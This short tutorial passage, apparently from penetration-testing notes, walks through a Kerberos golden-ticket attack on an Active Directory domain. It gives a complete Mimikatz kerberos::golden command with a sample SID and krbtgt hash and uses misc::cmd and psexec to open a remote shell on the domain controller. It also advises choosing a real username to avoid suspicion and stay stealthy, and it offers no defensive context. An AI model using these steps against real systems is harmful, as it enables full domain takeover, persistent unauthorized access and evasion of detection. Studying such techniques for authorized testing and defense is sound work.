To obtain a golden ticket on a compromised DC, dump the krbtgt NTLM hash with Mimikatz as described below:
Using the same method as creating a silver ticket, switch to a compromised workstation and create the golden ticket in memory with kerberos::golden
. This does not require administrator.
kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599479668 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt
The username does not matter since DC trusts TGT blindly if PAC is not enabled. Of course, using a real username is always better as it reduces suspicion and adds stealth.
Use misc::cmd
to launch a shell with the current ticket and use psexec.exe \\dc01 cmd.exe
to launch a remote shell. Note that the use of hostname is mandatory to perform overpass-the-hash here, as otherwise using an IP address will require NTLM authentication.